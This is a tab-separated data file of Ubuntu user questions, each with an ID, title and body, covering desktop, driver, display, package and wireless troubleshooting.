59600	double click executable file and nothing happens	i 'm trying to install a game for linux called myth 2 . autorun does n't run when i insert the cd . when i double-click or right-click and the select `` open '' on the setup file , a box appears saying that it 's an executable file , and what i want to do . i click on `` run '' , but nothing happens after that . i checked the permissions , and it allows it running the executable . how do i install this game ? please break down instructions as much as possible , i 'm not used to using commands and terminal . ; )
59603	blender distorted ui	i have just downloaded the latest version of blender from the website on to my xubuntu machine , when i open it , i get this : the screenshot below is a zoomed in version of the top left of the screen , as you can see , the ( i ) icon is displayed fine but the text is unreadable . images appear fine but the text is very distorted . what other information should i provide that may help to solve this problem ? thanks in advance , ell . edit : i downloaded the linux x86-32 package from the blender website ( pre-compiled binaries ) and extracted it , i 've tried running plain blender ( just open the blender executable ) as well as running the blender-softwaregl script but both give the same results . both of them give the following results when run from the terminal : ndof : dead zone set to 0.10 connect failed : no such file or directory ndof : spacenavd not found info : config directory with `` startup.blend '' file not found . found bundled python : /home/elliot/downloads/blender-2.59-linux-glibc27-i686/2.59/python
59606	benefits of using squid proxy in ubuntu server	what are some of the benefits of installing squid proxy in an ubuntu server that is sharing its internet connection to a group of pcs in a lan .
59611	are there any sort of format and style themes/templates in libreoffice ?	i am wondering if there 's any kind of predefined or downloadable themes or templates for text formatting styles ( default , heading 1/2/etc ) , predefined colors ( palettes ) , bullet styles , etc. , in libreoffce . if there are , where do i find them and how can i apply them ?
59612	display does not blank on a thinkpad t61	i have ubuntu lucid with kernel 2.6.35 on a thinkpad t61 . in the power management settings i set it up to blank the display after 2 minutes . this works right after i log in , but after a few hours of active use , closing applications and then walking away from the computer , the display wo n't ever blank until i log out and log in again . the screensaver , although enabled , activates only in the first few hours after logging in . what can be the root cause of the problem ? incorrect screensaver or blanking settings can not be the root cause , because these features work with the current settings right after logging in . user-visible applications ( such as firefox , chrome , their flash player or skype ) can not be the root cause , because the screen does n't blank even after i quit these . ( verified with ps ax . ) is there a workaround ? how do i debug the problem ? is there a tool which displays a counter like 1:57 seconds until blanking ? please note that in this question i do n't care about sleep , suspend or hibernate -- i care only about blanking the display .
59614	is there a way to run mtgo ( magic the gathering online ) ?	is there any way to run this on ubuntu ? either through wine or a virtual machine ? can anyone help ? some people claim to have this running on archlinux but i 'm not smart enough to manage that . i 'd give my left arm to be able to run this on ubuntu rather than having to dual boot /sigh
59621	how to change the monitor 's refresh rate ?	how do i change the monitor 's refresh rate in oneiric ? there is no option to do it in the displays dialog now . by default it 's 60hz , but i need 75hz on my monitor . in previous releases there used to be such an option in the displays dialog . edit - half baked solution the best i could do so far was : xrandr -s 1280x1024 -r 75 this is perfect , but my problem is that it is n't permanent . it defaults back to 60 hz after logging out and back in . perhaps this should go into some script and added to startup ? i just do n't know how to do that .
59623	why ca n't i get my dell latitude to output to an external monitor at 2560x1440	i 've got a dell latitude e6520 and i 'm using the e port dock to get a displayport output to plug into a dell u2711 monitor . the native resolution of the monitor is 2560x1440 and i 'd really like to get it to that resolution . i 'm using the nvidia x settings thing and i the highest resolution listed is 1920x1080 . is it worth hand editing the xorg.conf file maybe ? or am i just out of luck ? the graphics card ( nvidia nvs 4200m 512mb ) seems to be functioning ok . unity and the composite effects are all working and pretty snappy . i did have to disable something called optimus in the bios but i gather this is just a power saving thing .
59628	can i put a 'delete password ' on files within ubuntu one synced folders ?	i see that this is not currently possible . could it be made possible ? i.e . to either have a 'master delete ' password or to have a comprehensive 'undelete ' function should a user on the family computer accidentally hit the delete button on an important ubuntu one folder .
59629	impulse convolution options in ubuntu	i 've made impulse to correct my speakers response , and would like to use it in my ubuntu 11.04 . only possible ( in common sense ) way seems to be through jack and jack_convolver plugin . as not all applications communicate with jack , nor i run it all the time , i would like to know for other possibility if present . i got 'tumbleweed ' badge for this unpopular question , and thought to demystify it with a bounty and little comment : ) first , i know very little about ubuntu 's underlying audio stack , as i 'm new to linux . i think that question is asked clearly for those who might know about it . then here is what i got so far : it seems this is possible through module-ladspa-sink with which help i could load ladspa plugin and use it globaly . problem here is that i found only one ladspa impulse convolver plugin in steve harris plugins and this plugin comes with preset impulses so common user ca n't customize it . i downloaded source code , and thought that i could maybe include my impulse in it , then compile it , but format of this impulses is unknown to me as i 'm not a programmer . my impulse is 32bit pcm wav while impulses in this package are in a form of number arrays in c header files ( link ) so i ca n't find my way there . if i knew this format rules , than i guess it would n't be hard for me to represent my impulse following convention . i tried to contact steve by mail ( which is encouraged on his portal ) but my mail was rejected as reported by google mail brutefir this could be another possible solution , but ... home page was inaccessible so i used cached view to read boring documentation without single usage example . after that i searched google for possible example usage and found some `` specialized '' examples that shred a bit of light about it , but i could n't find anything about the meaning of .brutefir_convolver configuration file . this project seems discontinued and i do n't know if it is good idea even if i knew how to set it
59631	how to recover from uninstall of ubuntu-desktop ?	in my infinite wisdom , during a system upgrade , i somehow managed to remove 'ubuntu-desktop ' and several other key packages . as a consequence , my desktop is now gone - i only see a standard x terminal window on login . any suggestions for how i might rectify this situtation ( short of full reformat and reinstall ; i have mails and other content on the hard drive that i wish to retain ) ? i 've tried simply reinstalling ubuntu-desktop with apt-get as suggested by fossfreedom below , but then it complains about dependencies not being met . can i ask it to install dependencies automatically somehow ? thanks .
59632	basic web development ide/editor like dreamweaver ?	i 've used windows for many years , using dreamweaver as my editor as it had a file tree which is based on a project ( via local , ftp or sftp ) . i need a web development ide with the following functionality : syntax highlighting for php , html , css , javascript file tree - local , ftp , sftp , project-based ( e.g . via the methods of local/ftp/sftp ) in other words , like dreamweaver can open multiple files ( tabbed ) additionally , i would n't mind features like debugging , class listings , etc , as long as i can hide them away .
59634	any alternatives to virtualbox for virtualization	well as the title reads , are there any other virtualization softwares in the mould of virtualbox be it proprietory or open source ?
59635	ca n't format hard drive back to windows 7 after fully installing ubuntu	i 've searched the posts and ca n't find the exact answer i need . i 've installed ubuntu to my hard drive completely , and wiped my windows 7 . i do not want ubuntu anymore ; i want windows 7 back . but when i put in my cd to reinstall windows 7 , it said my disk partition needed to be in ntfs format . i ca n't format my drive from here , but i can delete it , although i do n't know what that would do . the other partition i have is my system recovery partition . so how do remove this partition ?
59638	do i need a desktop to run a gui ?	i am setting up a light weight vm , following the guide in the ubuntu documentation what i want to be able to do is launch a gui application . i do n't need / want anything on the desktop . first i installed xorg . but i ca n't launch a gui . the next step is to install a `` window manager '' . so i installed xfce4 , and then startx launches a desktop . what do i need to launch a gui but not launch a desktop ?
59640	how can i completely remove xfce4 when apt-get remove -- purge does n't work ?	starting with a ubuntu server , i wanted a window manager , so i installed xfce4 . i used sudo apt-get install xfce4 to do this . to remove it , i used sudo apt-get remove -- purge xfce4 which did n't work , and neither did sudo dpkg purge xfce4 as evidenced 1 ) startx launches the xfce desktop , and 2 ) apt-cache search xfce4 returns a long list of installed packages . so , how can i get rid of xfce4 and it 's dependencies ?
59641	how to establish wireless connection from command line ?	can someone please tell me how i can establish connection to my wifi network from the command line ? ( my desktop gui is fried . ) i 've tried the following : sudo iwconfig wlan0 essid network_name sudo iwconfig wlan0 key s : network_password however , the second command ( to set the password ) fails with an error message reading : `` invalid argument '' . thanks .
59651	how do i get unity working again after installing the wrong video driver ?	first off i did something stupid . i downloaded a nvidia driver even though i have an integrated chipset . after installation my unity was still working . however , when i restarted my computer i got an error message saying that i ca n't run unity . i uninstalled the nvidia driver . i restarted my computer . unity still does not work . in the terminal i type `` unity '' and everything looks okay until i get three error messages that say this : xlib : extension `` glx '' missing on display `` :0.0 '' . followed by : compiz ( opengl ) - fatal : glxcreatecontext failed compiz ( bailer ) - info : ensuring a shell for your session jesse @ jesse-pc : ~ $ can not register the panel shell : there is already one running .
59660	how to report a bug for no sound through headphones ?	so this is the first version of ubuntu that stops the sound from coming out of my speakers when i plug in headphones . unfortunately it also stops the sound altogether ... i would like to submit a bug report but i ca n't remember how , nor what program i should submit it for ?
59663	how to type `` ç '' when using usa intl as the keyboard layout ?	i asked the same question when i used maverick meerkat but i ca n't make that solutions work on unity . i want to use the keys ´ followed by c and the output should be `` ç '' . it works that way in windows out of the box , and it did work in ubuntu 10.10 following the solutions given in the question above . but in 11.04 it outputs `` ć '' . how to change that ?
59665	install adb/sdk	i 'm trying to install adb/sdk in my droid so that i can root my phone and eventually mess around with a custom rom . i 'm using the instruction here : http : //androidadvices.com/how-to-install-set-up-and-use-adb-for-android-devices/ it says to download the sdk file and then find the sdk manager file . however , i 'm not finding any sdk manager files in the tar.gz file . i 'm using ubuntu 10.10
59668	airmon-ng fails to create monitor interface	when i try to start airmon-ng , i get the following output # airmon-ng start wlan0 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 993 avahi-daemon 994 networkmanager 999 avahi-daemon 1539 wpa_supplicant 4568 dhclient process with pid 4568 ( dhclient ) is running on interface wlan0 interface chipset driver wlan0 broadcom b43 - [ phy0 ] when i kill those processes with kill -9 993 994 999 1539 4568 it does n't help . airodump-ng and aireplay-ng wo n't work .
59669	blue `` gap '' behind the unity launcher button ?	i regularly have a gap in the upper-left corner of the button for the unity launcher . it is almost like a beveling of the global menu bar . it seems common when using chrome , but it also occurs when i am using other programs , such as nautilus . i find it quite annoying . is there anything i can do ?
59670	are there any gui equivalents of `` initctl '' ?	are there any gui equivalent of initctl , i have tried boot-up manager in short i was looking for some advanced gui based daemon control tool .
59672	recommendation for a colecovision emulator ?	i 'm searching an emulator for colecovision - a home games console from the early '80s . i 've found two : colem , which starts but does n't seems to load the cartidges adamem , compiled but not working ( does n't start , saying that `` only 8,16,32 bpp display mode of x are supported . i set to 16 via nvidia panel ) . are there any other friendly emulators ? ( xmess is too messy for my patience and i 'd prefer a specific emulator ) . what i 've tried : if i try to compile adamem with svga ( `` sudo make svga '' ) it says : raffaele @ natty : ~/scrivania/adamem $ sudo make svga [ sudo ] password for raffaele : make -f makefile.svgalib make [ 1 ] : ingresso nella directory `` /home/raffaele/scrivania/adamem '' gcc -wall -m486 -o2 -fomit-frame-pointer -dzlib -dlsb_first -dhave_clock -dlinux_svga -dunix -djoystick -dsound -dx86_asm -c -o adamem.o adamem.c cc1 : error : unrecognized command line option `` -m486 '' make [ 1 ] : *** [ adamem.o ] errore 1 make [ 1 ] : uscita dalla directory `` /home/raffaele/scrivania/adamem '' make : *** [ svga ] errore 2 when i compile it with x ( `` make x '' ) raffaele @ natty : ~/scrivania/adamem $ make x make -f makefile.x make [ 1 ] : ingresso nella directory `` /home/raffaele/scrivania/adamem '' gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o adamem.o adamem.c adamem.c : in function ‘loadconfigfile’ : adamem.c:589:18 : warning : pointer targets in assignment differ in signedness adamem.c : in function ‘fixfilenames’ : adamem.c:630:34 : warning : statement with no effect adamem.c : in function ‘main’ : adamem.c:742:2 : warning : pointer targets in passing argument 2 of ‘loadconfigfile’ differ in signedness adamem.c:575:13 : note : expected ‘unsigned char *’ but argument is of type ‘char *’ adamem.c:758:2 : warning : pointer targets in passing argument 2 of ‘loadconfigfile’ differ in signedness adamem.c:575:13 : note : expected ‘unsigned char *’ but argument is of type ‘char *’ adamem.c : in function ‘loadconfigfile’ : adamem.c:581:8 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o coleco.o coleco.c coleco.c : in function ‘getsnapshotparams’ : coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strlen’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strcmp’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strlen’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strcmp’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strcmp’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c:1128:2 : warning : pointer targets in passing argument 1 of ‘__builtin_strcmp’ differ in signedness coleco.c:1128:2 : note : expected ‘const char *’ but argument is of type ‘byte *’ coleco.c : in function ‘_savesnapshotfile’ : coleco.c:1254:2 : warning : pointer targets in passing argument 1 of ‘strcpy’ differ in signedness /usr/include/bits/string3.h:103:1 : note : expected ‘char * __restrict__’ but argument is of type ‘byte *’ coleco.c:1259:3 : warning : pointer targets in passing argument 1 of ‘strcpy’ differ in signedness /usr/include/bits/string3.h:103:1 : note : expected ‘char * __restrict__’ but argument is of type ‘byte *’ coleco.c:1265:3 : warning : pointer targets in passing argument 1 of ‘strcpy’ differ in signedness /usr/include/bits/string3.h:103:1 : note : expected ‘char * __restrict__’ but argument is of type ‘byte *’ coleco.c : in function ‘startcoleco’ : coleco.c:1496:6 : warning : suggest explicit braces to avoid ambiguous ‘else’ coleco.c : in function ‘optionsdialogue’ : coleco.c:2638:9 : warning : ignoring return value of ‘fgets’ , declared with attribute warn_unused_result coleco.c : in function ‘checkgz’ : coleco.c:869:9 : warning : ignoring return value of ‘tmpnam’ , declared with attribute warn_unused_result coleco.c : in function ‘startcoleco’ : coleco.c:1127:5 : warning : array subscript is above array bounds gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o z80.o z80.c gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o dsp.o dsp.c in file included from dsp.c:24:0 : mixer.h : in function ‘voiceon’ : mixer.h:198:30 : warning : cast from pointer to integer of different size mixer.h:198:41 : warning : cast from pointer to integer of different size mixer.h:198:56 : warning : cast from pointer to integer of different size mixer.h : in function ‘_mix_some_samples’ : mixer.h:298:11 : warning : suggest explicit braces to avoid ambiguous ‘else’ mixer.h:322:11 : warning : suggest explicit braces to avoid ambiguous ‘else’ mixer.h:353:11 : warning : suggest explicit braces to avoid ambiguous ‘else’ mixer.h:378:11 : warning : suggest explicit braces to avoid ambiguous ‘else’ mixer.h:277:6 : warning : suggest explicit braces to avoid ambiguous ‘else’ mixer.h : in function ‘readpipe’ : mixer.h:522:26 : warning : cast to pointer from integer of different size mixer.h:522:51 : warning : cast to pointer from integer of different size mixer.h:523:15 : warning : cast to pointer from integer of different size dsp.c : in function ‘writepipe’ : mixer.h:101:8 : warning : ignoring return value of ‘write’ , declared with attribute warn_unused_result dsp.c : in function ‘soundmainloop’ : dev_dsp.h:69:10 : warning : ignoring return value of ‘write’ , declared with attribute warn_unused_result gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o sound.o sound.c gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o x.o x.c x.c : in function ‘keyb_handler’ : x.c:428:9 : warning : suggest explicit braces to avoid ambiguous ‘else’ x.c : in function ‘initmachine’ : x.c:938:13 : warning : pointer targets in assignment differ in signedness x.c:964:9 : warning : pointer targets in passing argument 6 of ‘xcreateimage’ differ in signedness /usr/include/x11/xlib.h:1449:16 : note : expected ‘char *’ but argument is of type ‘byte *’ in file included from x.c:1432:0 : common.h : in function ‘bigsprite’ : common.h:58:5 : warning : suggest explicit braces to avoid ambiguous ‘else’ common.h : in function ‘sprite’ : common.h:86:5 : warning : suggest explicit braces to avoid ambiguous ‘else’ x.c : in function ‘calibratejoystick’ : x.c:677:9 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result x.c:678:9 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o z80debug.o z80debug.c gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o bitmap.o bitmap.c gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o unix.o unix.c gcc -s -wl , -map , adamem.map -l/usr/x11r6/lib \ -o adamem adamem.o coleco.o z80.o dsp.o sound.o x.o z80debug.o bitmap.o unix.o -lxext -lx11 -lz coleco.o : in function `checkgz ' : coleco.c : ( .text+0x1e8a ) : warning : the use of `tmpnam ' is dangerous , better use `mkstemp' rm -f cvem ln -s adamem cvem gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o keys.o keys.c gcc -s -o keys keys.o gcc -wall -o2 -fomit-frame-pointer -dlsb_first -dunix_x -dunix -dmitshm -dhave_clock -dsound -dzlib -c -o makedata.o makedata.c makedata.c : in function ‘main’ : makedata.c:69:3 : warning : pointer targets in passing argument 3 of ‘loadsam’ differ in signedness makedata.c:28:12 : note : expected ‘int *’ but argument is of type ‘unsigned int *’ makedata.c:74:10 : warning : ignoring return value of ‘fscanf’ , declared with attribute warn_unused_result makedata.c : in function ‘loadsam’ : makedata.c:50:8 : warning : ignoring return value of ‘fread’ , declared with attribute warn_unused_result gcc -s -o makedata makedata.o -lz makedata make [ 1 ] : makedata : comando non trovato make [ 1 ] : *** [ adamem.snd ] errore 127 make [ 1 ] : uscita dalla directory `` /home/raffaele/scrivania/adamem '' make : *** [ x ] errore 2 when i try to start emulator ( ./adamem or ./cvem ) complains with : initialising unix/x drivers ... opening display ... failed - only 8,16 and 32 bpp displays are supported
59676	wanted to install rpm based software or application ?	as i see more application/softwares are distributed in rpm format , i would like to know if i should choice from the below two . yum alien are there any better ( `` stable/advanced '' ) tool available for installation/remove/update of rpm format application/softwares under ubuntu..
59680	windows live skin/theme for any im ( amsn , empathy , emesene , etc )	today i was working on a place with 12 pcs and the only reason why i could not move the place from windows to ubuntu was that the users did not like how amsns , empathy or emesene themes looked . they only like the theme that uses windows live messenger . basically the live msn as it comes . so i am looking for a theme that looks exactly like the latest version of microsoft 's windows live messenger . at least in a way that fools the user completely . amsn has some nice one but they look old and not like the new live msn . where can i find a theme that looks like the windows live msn . just to not confuse with other themes , am talking about this one :
59685	brighness and sound problems on an acer aspire 4750g	i am using aspire 4750g , with processor of intel core i5 . currently i 'm using ubuntu 11.04 - the natty narwhal . i would really need some guide how to fix these problems : i ca n't hear any sound after plug-in earphone . i ca n't adjust the screen brightness . thank you .
59687	screen freezes after login when using a broadcom bcm4311	after using airmon-ng and disabling eth0 and wlan0 , and restarting my computer in dual boot mode under ubuntu 11.04 my computer froze right after logging into ubuntu . i tried re-enabling eth0 and wlan0 , but i 'm not sure if it was done properly . when i plug an ethernet cable into my computer it starts up with no problems , no freezing , no nothing . however , when i unplug the cable the computer freezes shortly after . i figure that this issue may revolve around a wireless related process ? if this is n't solved could i reinstall ubuntu 11.04 in dual boot without having to worry about the 20gb of partitioned space that i allocated it ? i 'm using broadcom bcm4311 hardware , and i have not mounted any network file systems .
59690	user `` nobody '' keeps showing on the user list after being excluding some users	i did some googling but there were people with same problem ( more on why than problem ) but nothing explains reason why `` nobody '' shows up after excluding some users from login screen user list . i can simply exclude nobody by editing custom.conf but what is the reason for nobody showing up ?
59691	ca n't play 1080p/blueray films without lag	most of the films i watch on my pc are in hd , those of 20gb or more , even between 50-72gb . on windows i can play all those films without problem . some of them are .mkv and others are bdmv . i did not install any driver from catalyst or from additional drivers . nevertheless i have direct rendering : mortuus @ alliancecore : ~ $ glxinfo | grep direct direct rendering : yes i 've tested it with vlc 1.1.9 ( with and without gpu acceleration ) , smplayer , totem and moovida center . none was successful . my specs : amd phenom ii x4 905e 2'5ghz ram 4gb ati radeon hd4890 my resolution is 1920x1080 thanks in advance
59692	is there a plasmoid that can display at least the title of now playing song while using bangarang ?	iâve switched to bangarang as my default player in kubuntu , but i ca n't seem to find a now playing plasmoid that works with it . any suggestions ?
59694	what driver should i use for bcm4313 ?	when i installed ubuntu 11.04 it suggested i should use the proprietary sta driver , so i did . this caused a lot of problems and i spent hours troubleshooting . i then tried removing the driver by unchecking the driver in additional drivers and now everything works fine . obviously ubuntu recommends the sta driver but the other driver seems to work much better . all documentation i find about ubuntu and bcm4313 also suggests the sta driver . why is the sta driver recommended ? what is the advantage of using that driver ? will it cause problems when not using the sta driver ?
59703	skype : error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory	i am using ubuntu 11.10 64bit , skype was working however after running sudo apt-get autoremove skype is throwing skype : error while loading shared libraries : libxss.so.1 : can not open shared object file : no such file or directory how can i fix this ?
59705	music player with 'searchable ' media library ?	i have been looking quite few days for that but i have not found an answer . i am trying to find a good music player for ubuntu in which i would be able to search the media library like in winamp ( typing te band 's or song 's name in a search field ) . i have tried this with banshee but it lags a lot when i change the 'selected ' album in library i can not find the search field/option in there any suggestions/solutions ?
59709	how to truely separate gnome & kde on the same computer ?	first when i decided to install kubuntu-desktop on the same machine as my standard ubuntu-desktop , i tried to integrate those two in a way that i use some of the same applications on either desktop . i failed doing that because of integration issues ( i 'm not talking about the look ! ) . now i like to try a different approach : i want to separate those two to the max . but i find that either desktop seems to load a lot of programs that have no place nor function in the other one . e.g . tracker starts alongside with the strig/nepomuk stuff , dropbox seems to load half of gnome into kde and kwallet starts in gnome even when no application tries to access it . gnome keyring on the other side starts with kde for a good reason , but i ca n't set it up to use my login password as authentication without entering it again to start the keyring . what are the right settings to separate the two desktops to the maximum possible extent ? where are the files controlling this ? for example i tried to use lightdm to have no gdm or kdm running but it seems to mess up some things like keyboard bindings ... is there a tutorial out there that i could n't find while googling ? any comprehensive information should help !
59718	how do i get rid of double battery monitor status ?	it seems there is a bug that displays an extra battery monitor in oneiric . from what i found , it is not right in the panel , but in the wallpaper . please the following images :
59723	why does my computer keep freezing ?	my computer is presenting some weird behaviour , and i do n't know what to try next to work out what 's going wrong . first the behaviour . the computer occasionally freezes . i can move the mouse , and the cursor changes ( e.g. , to a movement arrow , hand , text cursor etc ) . but nothing else on the screen moves . counters do n't count , windows do n't move , clicks do nothing . waiting does n't help - it does n't wake back up . i can ctrl-alt-f5 to an alternative terminal session and see what 's running . nothing seems to be maxing out any resources . as far as i can tell , it 's not tied to any one single application . i 've tried to use the computer with different apps and it seems to still happen whatever i stop running , short of killing of xorg and nautilus , obviously . i 've tried the xorg-edgers repo . no improvement . i 've disabled compiz ( i think ) - no improvement . i 've looked in a few log files but could n't see anything that would indicate where the problem is ( though i might well have been looking in the wrong place ) . my next options are to reinstall and/or start swapping out hardware . but before i do that , can anyone tell me what can cause crashes like this , where the mouse can move but nothing else does ? or can anyone tell me which logs files i should be checking ? is there anything else i can try , to diagnose the problem ? is it likely to be a hardware issue ? the computer is a vanilla dell xps 8300 - details at http : //dell.com/uk/p/xps-8300 - except for the graphics card , which is an ati radeon x1300 pro .
59725	batch editor for text or html files ?	is there a tool that can help me to batch edit text files in a certain folder ? i need to delete or insert snippets repeatedly in lots of html files and restructure them . thanks in advance !
59732	can i convert garmin .img maps to a format that can be displayed on an android phone ?	i would like to be able to use the contour maps that are available at http : //www.smc.org.uk/contourmaps.php on my phone . i read on the qlandcartegt wiki that this file format is closed . i am a total noob when it comes to digital maps , so any help would be appreciated .
59733	what is the current situation with btrfs and 11.10 ?	it feels like i 've read about btrfs forever , but there has always been something that makes me not want to use it . but i 'm guessing things are improving , so i 'd like to know what the situation is currently . that means in 11.10 . do we have tools to fix a broken btrfs ? i 've read that this has been a problem for a long time . do we have gui apps to take advantage of the cool features of btrfs , like cloning , snapshots , cow , raid , etc ? do we have user friendly tools to convert an ext4 into a btrfs ? i 've read about performance issues in some cases . is that still an issue ? have i missed an important question ?
59735	fix unity after uninstalling gnome 3	well , i installed and uninstalled gnome 3 as indicated on this answer : how do i install the latest version of gnome 3 ? i have , however , noticed that the dash now keeps being in it 's default configuration , and it has some minor bugs . is there any way to fix this ? thanks
59736	how to close one set of tab identified in chromium through command line	how to close one set of tab identified in chromium thru command line ; as we can see that a set of tabs are represented thru a pid ( process id ) . i would like to know how to close the tabs from command line . we know the process id ,
59738	i can get the apple magic mouse to pair , but the mouse stays in discover mode	i 've got a magic mouse , using an asus bluetooth dongle . this is a description of trying it on natty a few months ago on a lenovo laptop with unity , though trying again on precise on a desktop with gnome shell gives me pretty much the same results . the mouse does actually work on lucid , though i think scroll was n't supported back then . i try to follow the instructions here : https : //help.ubuntu.com/community/applemagicmouse though the actual bt preferences wizard diverged slightly at step 6 back when i looked at these instructions for natty . i bring up the bt preferences . i turn on my mouse , wait for it to start blinking . i click `` set up new device ... '' . it finds my mouse . i click on pin options and set it to 0000 . ( note that in lucid , i do n't do this , instead it comes up as a dialog as it 's pairing , which does not happen here ) i select it and click forward . it goes through its process and says it 's successfully connected . it 's now listed as a device in the bt preferences window , but the mouse is still blinking , and does n't move my cursor . there 's an icon , i think implying `` connected '' , that stays on until the mouse gives up on discovery mode and shuts off . ( the same icon goes away when i click `` disconnect '' in the preferences window ) if i try the same thing , but leave the pin on `` automatic '' , it does the same thing , except the `` connected '' icon only stays on for a second . any idea where to go from here ?
59741	login dialog and all windows flickering , background displaying fine on an ati radeon hd 5750/5770	i am running ubuntu 11.04 64bit with a ati radeonhd 5750/5770 ( juniper ) , 4gb ram . when i get to the login screen , all i see is a flickering white box instead of the login dialog . the background displays fine . my hunch is that this problem is not related to the video driver , since i 've reinstalled xserver-xorg-video-radeon and deinstalled fglrx . i deleted the xorg.conf and tried different configurations , all with the same result . this only occurred after a recent update - though i do n't know which packages got update . any ideas ?
59745	how do i include a comma in an apt pin definition ?	i 'd like to create an apt preference file with a pin definition that matches packages originating from google , inc.. the following definition does n't seem to be doing anything : package : * pin : release o=google , inc. pin-priority : 900 i suspect that the comma is causing problems . how can i escape it ? none of the following have worked : release o= '' google , inc. '' release o='google , inc.' release o=google\ , inc. release o=google\\ , inc . curiously , the following does match google , inc. successfully : release o=google ? inc . but this is n't the solution i 'm looking for . i want to know how to match google , inc. without resorting to ( precarious ) wildcards . more information : $ apt-cache policy | grep -c 1 'google , inc.' 500 http : //dl.google.com/linux/earth/deb/ stable/main amd64 packages release v=1.0 , o=google , inc. , a=stable , n=stable , l=google , c=main origin dl.google.com 500 http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages release v=1.0 , o=google , inc. , a=stable , n=stable , l=google , c=main origin dl.google.com $ grep origin /var/lib/apt/lists/dl.google.com_*_release /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_release : origin : google , inc. /var/lib/apt/lists/dl.google.com_linux_earth_deb_dists_stable_release : origin : google , inc .
59746	how to choose in which display the login box will appear ?	i have 2 monitors where the desktop is extended . they are connected to an amd/ati video card through dvi cables . when i boot the login form is shown at the secondary monitor , but when i log off it 's shown in the primary one . how to make the login form appear always in the primary one ?
59747	text conversion , binary digits - > hex ( or decimal )	i have a huge text file with digits representing an 8 bit value in binary . i want to convert these to hexadecimal ( or decimal , does n't really matter ) . that is , i have a text file containing e.g . 0 0 0 0 1 1 0 1 0 0 1 1 1 0 0 1 0 1 0 0 0 1 0 1 1 0 0 0 1 1 0 1 ( just 8 bits ) and i 'd want to convert this to , say , 0x0d 0x39 0x45 0x1d it sounds like this could be done with an awk script/vim macro , or a combination of any other tools .
59749	how do i make sure my im client is using the right ssl certificate ?	google 's had fraudulent ssl certificates issued for their domains . so , the question i have is , `` how do i make sure pidgin/empathy trust the correct certificate ? ''
59754	webgl on google chrome with amd card	when i try to use cooliris for google chrome it shows the following message webgl did not initialize properly . make sure you are running the latest version of chrome . i have an amd/ati video card . how to fix this ? google chrome version is 13.0.782.218 http : //get.webgl.org/ says `` hmm . while your browser seems to support webgl , it is disabled or unavailable . if possible , please ensure that you are running the latest drivers for your video card . '' catalyst control center says `` catalyst version 11.5 and driver packaging version 8.84.6-110324a-116088c-ati '' google-chrome -- enable-webgl did n't work
59758	why is my wireless driver not detected ?	when typing iwconfig i only get `` no wireless extensions '' how do i get the ubuntu wireless driver to be detected ? lspci : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge 